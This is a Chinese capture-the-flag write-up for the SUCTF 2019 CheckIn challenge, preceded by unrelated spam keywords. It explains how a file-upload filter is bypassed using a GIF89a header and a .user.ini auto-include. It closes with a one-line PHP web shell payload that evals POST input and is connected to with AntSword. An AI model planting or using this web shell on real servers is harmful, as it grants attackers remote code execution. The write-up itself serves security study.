有什么平面设计的网站,站长统计性宝app,成都视频剪辑哪家培训机构好,沂水做网站[SUCTF 2019]CheckIn 文章目录 [SUCTF 2019]CheckIn掌握知识解题思路关键paylaod 掌握知识
.user.ini文件上传利用–需要上传目录有一个php文件(index.php)#xff0c;文件头绕过#xff0c;文件内容#xff1f;检测
解题思路
打开题目链接#xff0c;发现又是一…[SUCTF 2019]CheckIn 文章目录 [SUCTF 2019]CheckIn掌握知识解题思路关键paylaod 掌握知识
.user.ini文件上传利用–需要上传目录有一个php文件(index.php)文件头绕过文件内容检测
解题思路
打开题目链接发现又是一个上传文件题目继续上传改后缀的一句话木马然后抓包修改php后缀发现返回非法后缀名尝试phtml.php3.php6...都没成功看来是白名单了。 只好尝试上传一下jpg文件查看一下其他过滤和上传目录发现还存在文件头检测和对文件内容?的检测。文件头添加GIF89a?即可绕过?的检测可以继续使用js代码执行php代码的方式 上传正常格式的jpg文件后发现回显了上传目录和目录结构发现了index.php文件。那看来是使用.user.ini文件了该文件能够实现文件包含内容前提就是上传的目录下有一个php文件这样使用.user.ini包含的文件就可以执行文件内的php代码了 利用方法已经明白接着就上传.user.ini和shell.jpg文件即可绕过文件头和文件内容即可成功上传 现在目录下存在.user,ini配置文件index.php的php文件和含有恶意代码的jpg文件只需要访问该php文件即可自动包含jpg文件执行其中的恶意代码所以蚁剑连接的地址也是该php文件。直接蚁剑连接在根目录下拿下flag 关键paylaod
script languagephpeval($_POST[a]);/scriptGIF89a?